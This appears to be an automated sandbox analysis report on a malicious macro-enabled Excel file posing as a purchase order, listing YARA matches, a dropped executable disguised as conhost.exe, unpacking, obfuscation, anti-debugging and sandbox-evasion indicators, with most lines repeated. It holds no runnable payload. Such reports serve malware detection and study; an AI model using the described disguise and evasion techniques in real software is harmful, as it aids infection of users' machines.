Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000003.2117438541.0000000000580000.00000004.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168715128.0000000000510000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168603978.00000000002F8000.00000040.00000001.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 00000003.00000002.2168630722.0000000000400000.00000040.00020000.sdmp, type: MEMORY Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.2.conhost.exe.400000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.raw.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_URL_in_EXE date = 2020-03-09, author = Florian Roth, description = Detects an XORed URL in an executable, reference = https://twitter.com/stvemillertime/status/1237035794973560834, score =
Source: 3.3.conhost.exe.580000.0.unpack, type: UNPACKEDPE Matched rule: SUSP_XORed_Mozilla date = 2019-10-28, author = Florian Roth, description = Detects suspicious XORed keyword - Mozilla/5.0, reference = Internal Research, score =
Source: classification engine Classification label: mal100.expl.evad.winXLSM@3/10@1/1
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsm Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\Desktop\~$PURCHASE ORDER No-17-11-98543.xlsm Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\ETTER\dAneDFma\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\user-PC
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREF9B.tmp Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Temp\CVREF9B.tmp Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Command line argument: n|D 3_2_00447BC0
Source: C:\ETTER\dAneDFma\conhost.exe Command line argument: n|D 3_2_00447BC0
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9%
Source: PURCHASE ORDER No-17-11-98543.xlsm Virustotal: Detection: 9%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe' Jump to behavior
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: unknown Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe'
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\ETTER\dAneDFma\conhost.exe 'C:\ETTER\dAneDFma\conhost.exe' Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: Window Recorder Window detected: More than 3 window changes detected
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: PURCHASE ORDER No-17-11-98543.xlsm Initial sample: OLE zip file path = xl/media/image1.png
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.tls:W;.rsrc:R; vs .text:ER;.rdata:R;.data:W;.rsrc:R;.reloc:R;
Detected unpacking (overwrites its own PE header)
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack
Source: C:\ETTER\dAneDFma\conhost.exe Unpacked PE file: 3.2.conhost.exe.400000.0.unpack
Uses code obfuscation techniques (call, push, ret)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044E69D push esi; ret 3_2_0044E6A6
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B3FE pushad ; retn 0044h 3_2_0044B41D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B4F6 push eax; ret 3_2_0044B50D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429588 push ecx; ret 3_2_0042959B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429DA6 push ecx; ret 3_2_00429DB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FA54D pushad ; iretd 3_2_002FA556
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FAFCA push cs; ret 3_2_002FB14C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005397D8 push ecx; ret 3_2_005397EB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044E69D push esi; ret 3_2_0044E6A6
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B3FE pushad ; retn 0044h 3_2_0044B41D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0044B4F6 push eax; ret 3_2_0044B50D
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429588 push ecx; ret 3_2_0042959B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00429DA6 push ecx; ret 3_2_00429DB9
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FA54D pushad ; iretd 3_2_002FA556
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002FAFCA push cs; ret 3_2_002FB14C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005397D8 push ecx; ret 3_2_005397EB

Persistence and Installation Behavior:

barindex
Drops PE files
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\ETTER\dAneDFma\conhost.exe Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZ\conhost[1].triumphloader Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Extensive use of GetProcAddress (often used to hide API calls)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00428808
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00428808 GetModuleHandleW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 3_2_00428808
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Contains functionality to detect sleep reduction / modifications
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D772 3_2_0040D772
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D772 3_2_0040D772
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
May check if the current machine is a sandbox (GetTickCount - Sleep)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051D9C2 3_2_0051D9C2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043FF74 FindFirstFileExW, 3_2_0043FF74
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005501C4 FindFirstFileExW, 3_2_005501C4
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D46C GetSystemInfo, 3_2_0040D46C
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040D46C GetSystemInfo, 3_2_0040D46C

Anti Debugging:

barindex
Checks if the current process is being debugged
Source: C:\ETTER\dAneDFma\conhost.exe Process queried: DebugPort Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Process queried: DebugPort Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Process queried: DebugPort Jump to behavior
Source: C:\ETTER\dAneDFma\conhost.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037EA LdrInitializeThunk, 3_2_004037EA
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037EA LdrInitializeThunk, 3_2_004037EA
Contains functionality to check if a debugger is running (IsDebuggerPresent)
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004299C8 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, 3_2_004299C8
Contains functionality to read the PEB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043635F mov eax, dword ptr fs:[00000030h] 3_2_0043635F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040460E mov eax, dword ptr fs:[00000030h] 3_2_0040460E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037CB mov eax, dword ptr fs:[00000030h] 3_2_004037CB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8E8 mov eax, dword ptr fs:[00000030h] 3_2_0043D8E8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8A2 mov eax, dword ptr fs:[00000030h] 3_2_0043D8A2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D91B mov eax, dword ptr fs:[00000030h] 3_2_0043D91B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002F8EF3 push dword ptr fs:[00000030h] 3_2_002F8EF3
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005465AF mov eax, dword ptr fs:[00000030h] 3_2_005465AF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051485E mov eax, dword ptr fs:[00000030h] 3_2_0051485E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051092B mov eax, dword ptr fs:[00000030h] 3_2_0051092B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00510D90 mov eax, dword ptr fs:[00000030h] 3_2_00510D90
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00513A1B mov eax, dword ptr fs:[00000030h] 3_2_00513A1B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DAF2 mov eax, dword ptr fs:[00000030h] 3_2_0054DAF2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB6B mov eax, dword ptr fs:[00000030h] 3_2_0054DB6B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0054DB38 mov eax, dword ptr fs:[00000030h] 3_2_0054DB38
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043635F mov eax, dword ptr fs:[00000030h] 3_2_0043635F
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0040460E mov eax, dword ptr fs:[00000030h] 3_2_0040460E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_004037CB mov eax, dword ptr fs:[00000030h] 3_2_004037CB
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8E8 mov eax, dword ptr fs:[00000030h] 3_2_0043D8E8
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D8A2 mov eax, dword ptr fs:[00000030h] 3_2_0043D8A2
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0043D91B mov eax, dword ptr fs:[00000030h] 3_2_0043D91B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_002F8EF3 push dword ptr fs:[00000030h] 3_2_002F8EF3
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_005465AF mov eax, dword ptr fs:[00000030h] 3_2_005465AF
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051485E mov eax, dword ptr fs:[00000030h] 3_2_0051485E
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_0051092B mov eax, dword ptr fs:[00000030h] 3_2_0051092B
Source: C:\ETTER\dAneDFma\conhost.exe Code function: 3_2_00510D90 mov eax, dword ptr fs:[00000030h] 3_2_00510D90
